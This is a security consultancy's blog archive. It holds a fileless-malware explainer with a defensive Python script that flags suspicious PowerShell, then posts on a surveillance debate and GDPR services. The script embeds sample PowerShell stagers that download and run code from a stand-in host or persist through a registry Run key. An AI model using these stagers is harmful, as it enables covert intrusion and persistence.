From Del Brazil Senior Security Consultant - Advent IM
Simply put, fileless malware is malware engineered to leave as little as possible on disk, which makes it very difficult to detect as part of any post-incident analysis. It is designed to operate and survive in the memory of a system, so in its simplest form a reboot would remove it. That sounds easy to defeat, and historically a reboot often was enough; however, there are now variants that gain persistence by writing an entry into the system registry (for example a Run key that launches a script stored in another registry value), so the code is loaded back into memory at every boot without ever being written to a file.

As with all computer software and hardware, there are always unknown vulnerabilities waiting to be exploited by attackers. The trick is finding the vulnerabilities before the attacker does and addressing them suitably; however, more often than not a vulnerability is only discovered after an attack has taken place, and it then becomes a race to identify a fix and make it available to legitimate users before attackers conduct further attacks on the many systems that share the flaw.

Stuxnet, the attack on the Iranian nuclear facility, is often cited as an early example of fileless techniques: although it did drop files (including signed drivers) onto the machines it infected, its main payload was injected into the memory of running processes rather than run as an ordinary executable.

The attack was directed at Microsoft Windows machines running specific Siemens industrial control software. Once a set of conditions was met (the presence of particular Siemens PLCs and drives), the malware delivered its payload, modifying the controllers' logic and causing physical damage to the equipment they drove, in this case uranium-enrichment centrifuges.

Because little or nothing is stored on disk on the target machine, any forensic examination has to be carried out in a particular manner to ensure that potential evidence is retained: the evidence lives in volatile memory, so the standard approach of powering the machine down and imaging the disk may erase, or at least make it very difficult to recover, any useful evidential material. Memory should be captured before the system is shut down. For this reason alone fileless malware is very attractive to would-be attackers, as it can leave little if any trace for standard digital investigative practices.

Attackers can develop malware that operates inside PowerShell scripts, where it can execute hidden commands (for example a command line run with a hidden window and an encoded payload that downloads and runs further code straight into memory) which may render the target machine defenceless or allow unauthorised access to sensitive data.

So the big question is: how do we defeat fileless malware? There is no simple answer, but as usual we go back to basic principles: systems (hardware and software) need to be updated and maintained in line with the manufacturer's requirements. This will not guarantee to defeat a fileless attack, since such attacks commonly exploit vulnerabilities that are not yet disclosed or patched, and frequently abuse legitimate built-in tools that no patch will remove; however, educating users not to download, install or open files, software, images or attachments from untrusted sources may reduce the likelihood of fileless malware being delivered and executed. Developers should also be required to use a sandbox environment to avoid a potential infection attacking a live system; this, coupled with enforcing the rule of least privilege, may reduce the possibility of an attack. Most importantly of all, ensure that the use of PowerShell and similar programs is strictly controlled (restricting who may run it, enabling script block logging and preferring constrained language mode where possible) and monitored for any unauthorised or unusual activity.
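As an added example (not code from the original article or from Advent IM), here is a small Python triage routine that applies the monitoring advice above to PowerShell command lines, whether taken from process-creation logs or from registry Run values. It decodes -EncodedCommand payloads (which powershell.exe expects as base64 of UTF-16LE text) and scores the indicators an analyst would look for: hidden windows, encoded commands, download cradles, in-memory execution and scripts pulled from the registry. The sample command lines, the download host stage.example.invalid and the registry path HKCU:\Software\Classes\UpdateCache are constructed for the demonstration, and the indicator weights are an assumption rather than a standard.

```python
"""Triage PowerShell command lines for 'hidden command' indicators.

Added example, not code from the original article.  The sample command
lines, the download host and the registry path below are constructed for
this demonstration; the indicator weights are an assumption, not a standard.
"""
import base64
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple

# Weighted indicators, matched case-insensitively.  Each one has legitimate
# uses (an administrator may run -NoProfile all day), so a finding is only
# raised once the combined score reaches a threshold.
INDICATORS = [
    ("encoded_command",   re.compile(r"-(?:e|ec|en|enc|encodedcommand)\b", re.I), 2),
    ("hidden_window",     re.compile(r"-w(?:indowstyle)?\s+hidden\b", re.I), 2),
    ("policy_bypass",     re.compile(r"-e(?:xecution)?p(?:olicy)?\s+bypass\b", re.I), 2),
    ("no_profile",        re.compile(r"-nop(?:rofile)?\b", re.I), 1),
    ("invoke_expression", re.compile(r"\b(?:iex|invoke-expression)\b", re.I), 3),
    ("download_cradle",   re.compile(r"downloadstring|downloadfile|net\.webclient|invoke-webrequest|\biwr\b", re.I), 3),
    ("registry_payload",  re.compile(r"get-itemproperty|\bgp\s+hk|hkcu:|hklm:", re.I), 2),
    ("base64_decode",     re.compile(r"frombase64string", re.I), 2),
    ("reflective_load",   re.compile(r"reflection\.assembly|\bvirtualalloc\b|\badd-type\b", re.I), 3),
]

# -EncodedCommand (and the abbreviations powershell.exe accepts) plus its base64 blob.
ENC_RE = re.compile(r"-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.I)


def decode_encoded_command(cmd: str) -> Optional[str]:
    """Return the clear text behind -EncodedCommand, or None.

    powershell.exe expects base64 of UTF-16LE text, so the blob must be
    decoded with that encoding, not UTF-8.  Malformed input yields None.
    """
    m = ENC_RE.search(cmd)
    if m is None:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


@dataclass
class Finding:
    source: str              # where the command line was observed
    command: str             # the raw command line
    decoded: Optional[str]   # clear text of an encoded payload, if any
    indicators: List[str]    # names of the indicators that matched
    score: int


def scan_command(source: str, cmd: str) -> Finding:
    """Score one command line together with its decoded payload, since the
    telling strings (IEX, DownloadString...) are usually only visible there.
    The opaque base64 blob is dropped before matching so that random base64
    characters cannot trigger or hide an indicator."""
    decoded = decode_encoded_command(cmd)
    text = ENC_RE.sub(" -EncodedCommand ", cmd)
    if decoded is not None:
        text += "\n" + decoded
    hits = [name for name, rx, _ in INDICATORS if rx.search(text)]
    score = sum(w for name, _, w in INDICATORS if name in hits)
    return Finding(source, cmd, decoded, hits, score)


def triage(records: List[Tuple[str, str]], threshold: int = 5) -> List[Finding]:
    """Findings whose score reaches the threshold, highest score first."""
    found = [scan_command(src, cmd) for src, cmd in records]
    return sorted((f for f in found if f.score >= threshold), key=lambda f: -f.score)


def encode_command(script: str) -> str:
    """Encode a script the way -EncodedCommand expects (used to build a sample)."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed sample records (source label, command line).  None are real log
# entries; stage.example.invalid and HKCU:\Software\Classes\UpdateCache are made up.
STAGER = "IEX (New-Object Net.WebClient).DownloadString('http://stage.example.invalid/a.ps1')"
SAMPLES = [
    ("process-create log (constructed)",
     r"powershell.exe -NoProfile -File C:\Scripts\Backup.ps1"),
    ("process-create log (constructed)",
     "powershell.exe -NoP -W Hidden -Enc " + encode_command(STAGER)),
    # Registry persistence: the Run value starts PowerShell, which pulls the
    # real script out of another registry value and runs it in memory.
    (r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run\Updater (constructed)",
     "powershell.exe -WindowStyle Hidden -NoProfile -Command "
     "\"IEX ([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String("
     "(Get-ItemProperty 'HKCU:\\Software\\Classes\\UpdateCache').Blob)))\""),
]

if __name__ == "__main__":
    for f in triage(SAMPLES):
        print(f"[{f.score:>2}] {f.source}: {', '.join(f.indicators)}")
        if f.decoded:
            print("      decoded:", f.decoded)
```

Run as a script, it reports the encoded download cradle and the Run-key persistence entry and leaves the routine backup script below the threshold. The decoding step is the part that matters: without it the second sample shows only a hidden window and an encoded command, and the download cradle stays invisible. In a real deployment the records would come from PowerShell script block logging (Windows event 4104), process-creation auditing such as Sysmon event 1, and periodic dumps of the Run keys, and the weights would be tuned against what is normal for the estate.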
By Ellie Hurst
Posted 23rd February 2018
In data protection, privacy, Question Time, Security, surveillance camera commissioner, Tony Porter
We attended this excellent event and have high hopes there will be more of this kind of frank and open debate in future.

From Tony Porter:

You never really know if an idea will work. Professor William Webster (Centre for Research Information Surveillance and Privacy) thought that if he "built it people would come". And they did – lots of people!

Delivering a commitment made as part of the National Surveillance Camera Strategy (Citizen Engagement strand), we took over a part of London School of Economics, ran a 'Question Time' themed event, packed the panel with high profile and compelling people and got the party started. A great turnout ensured a buzz reverberated around the room before the auditorium quietened and the panellists issued their opening position statements.

The debate started with a challenging question from the floor: should we have an integrated national CCTV network, harnessing crime, national security and critical national networks with the plethora of other cameras (state owned and private), as they seemingly do in the Middle East? Great question, and it certainly got the energy flowing. Mike Barton (Chief Constable of Durham Constabulary) made the point that if that's where society is going he'd rather run a gîte in France! The panel acknowledged that whilst there would arguably be law enforcement benefits in such an approach, the balance between privacy and security would be shifted far too easily and too heavily in the wrong direction, as well as being a significant step towards a dystopian society. (I précis!)

The debate moved quickly to incorporate subjects such as ANPR, police use of body worn video, emerging surveillance technologies, an absence of a clear basis in law for their use, regulation, the NHS, domestic CCTV, inappropriate retention of custody images of innocent people by the state, and questioned whether CCTV was actually of any value in preventing crime.

New surveillance technologies featured heavily, and Silkie Carlo, Director of Big Brother Watch, provided a passionate argument against the use of automated facial recognition cameras in society, suggesting that there is no clear basis in law for what are essentially biometric checkpoints and referencing their "Face Off" campaign. Simon Israel (Senior Home Affairs Correspondent for Channel 4 News) focused the debate upon the impact of surveillance on the citizen and wider society.

We were grateful for Lord Brian Paddick's presence. He illuminated the room with insights into the passage of the new Data Protection Bill, how GDPR will influence all manner of data processing, and also focused on issues of divergence between European member states. We managed to hold onto him for the totality of the debate, as he was required back at the House at the end of the event. Great effort!

Finally, me: I participated, but more importantly I listened. The most important aspect of the evening was to understand the views from the floor, and they were many and varied. I do have access to government and it's important I use that access to influence from a considered and informed perspective. My thanks go to all the panel members, to Professor Webster and to Professor Fussey who facilitated the event, and to Mike Gillespie and his team for managing my Twitter feed. Most importantly, I thank those people who gave up their time and turned up to make up the audience and make the event such a positive experience. A great night and great initial feedback.

The Surveillance Camera Commissioner's original blog post is here.
By Ellie Hurst
Posted 15th February 2018
In cctv, surveillance camera commissioner, Tony Porter, video surveillance
The Surveillance Camera Commissioner, Tony Porter, is taking part in an important Question Time-style event next week. If you want to find out more, and how to book your FREE place, please go to the Commissioner's blog.
By Ellie Hurst
Posted 15th February 2018
In data protection bill, Data Protection Officer, DPO, GDPR, MyDataProtectionOfficer, press release
**PRESS RELEASE**

Media Contact: Ellie Hurst, +44 (0) 121 559 6699, email@example.com
Date: 15.02.18

Advent IM launch MyDataProtectionOfficer, ahead of GDPR

The UK's leading independent, holistic security consultancy today announced the launch of its data protection advisory service, MyDataProtectionOfficer. The service is a direct response to the GDPR requirement for some businesses and organisations to have a dedicated Data Protection Officer (DPO), many of which subsequently discover they cannot resource another employee to meet this requirement, or are simply looking for a more cost effective and agile way to comply.

The continued focus on all matters data protection, brought about by the impending GDPR rollout in a few weeks, has meant that many businesses and organisations have been keenly studying the articles and guidance to discover what they need to do to be compliant, or at least what needs to be put in place to ensure they will become compliant. Some of those businesses and organisations will be discovering they need to appoint a DPO, and this revelation may have left some perplexed at the additional cost and unsure how they will go about it. Some may still be unsure whether this even applies to them.

With this potential data protection vacuum in mind, Advent IM, longstanding data protection practitioners, consultants and trainers, have stepped in with an advisory service to satisfy both the need for a DPO under GDPR and the need for the business to manage cost. MyDataProtectionOfficer is designed to meet all the GDPR requirements for a DPO, but instead of a full time employee who requires holiday pay, pension, sick leave etc., the team of data protection experts at your disposal is only chargeable for the time you actually use.

With the additional reassurance of more than fifteen years in data protection practice, businesses may find they are able to use expertise that would have been outside the pay scale they could have offered to an employee.

Advent IM Director Julia McCarron said: "We know there has been a lot of confusion and a great deal of fear around GDPR, and many people who have never had to focus a significant amount of time on data protection before are having to do so now. If you meet the criteria for a DPO and have perhaps left it late to work out how to resource one, or you can't get the level of expertise you need on a budget, or simply don't feel your business warrants a full-time resource, then MyDataProtectionOfficer is for you. Not only that, but with Advent IM's wider information security expertise and knowledge of implementing standards such as ISO27001, Cyber Essentials and IASME, those using our service benefit from a holistic approach that considers the wider aspects of securing all types of information. What may seem daunting to you is business as usual to us."

www.advent-im.co.uk/GDPR

Issued: 15.02.18  Ends  Ref: 0218-Advent-MyDPO

NOTES TO EDITORS

About Advent IM

Advent IM is an independent specialist consultancy, focusing on holistic security management solutions for information, people and physical assets, across both the public and private sectors.

Established in 2002, Advent IM is a centre of excellence for security services, promoting the benefits of best practice guidelines and standards and the need to address risk management to protect against potential threats.

From its offices in the Midlands and London, its consultants work nationwide and are members of the Institute of Information Security Professionals (IISP), The Security Institute (SyI) and the British Computer Society. Consultants are also Lead Auditors for the international standard for information security management (ISO 27001), NCSC Certified Professionals (CCP), Practitioners of PRINCE2 (a recognised project management methodology widely used within the public sector), CISSP qualified, and Home Office trained physical security assessors.
Test your knowledge of infosec, data protection and GDPR with our crossword! Don't forget you can always look up GDPR for some of the answers, or check out the ICO website for help. Answers here tomorrow. PDF version.

If you need help or training with your GDPR preparation, visit our page or give us a call on 0121 559 6699.
By Ellie Hurst
Posted 16th January 2018
In data protection, GDPR, Metacompliance, Mike Gillespie
Our very own Mike Gillespie will be joining the gang from Metacompliance for their GDPR for Dummies Roadshow. Details of the whole roadshow are available here. Mike will be speaking at the Birmingham event. Book now!
Image credit: David Castillo Dominici at FreeDigitalPhotos.net

You cannot fail to have noticed that GDPR is imminent. We thought it might be helpful to offer you a quick look at where you need to be at this stage in the pre-GDPR game.

Do you have an information asset register?
Does it clearly identify why you collected the personal information?
Do you have clearly defined retention schedules in place?
Have you begun to implement Data Protection Impact Assessments (DPIAs, formerly Privacy Impact Assessments)?
Are they properly documented, and are the risks fully understood?
How's your privacy statement looking?
Is it clear and unambiguous?
Is your Subject Access Request process clearly signposted?
Are all staff trained to recognise one, and do they know who to pass it on to?
Have you begun to document how you comply with GDPR?
Are senior management fully trained and aware of the part they play in ensuring ongoing compliance?
Should (when) you be breached, can you evidence that appropriate security controls were in place?
Do you have an assurance plan to ensure controls remain effective?
Do you have an effective incident reporting and management plan to ensure proper reporting to the correct authorities?
Are employees fully versed and trained in this?
Do you document and evidence exercising the plan?
Have you implemented an effective no-blame near-miss reporting process?
Are near-miss stats transparently reported to all staff?
Are you using the results from near-miss reporting to tweak your culture?
Remember GDPR isn't a project. It requires a permanent change of culture. You must be investing in quality staff training now.
By Ellie Hurst
Posted 9th January 2018
In business, cyber security infosec, data protection, GDPR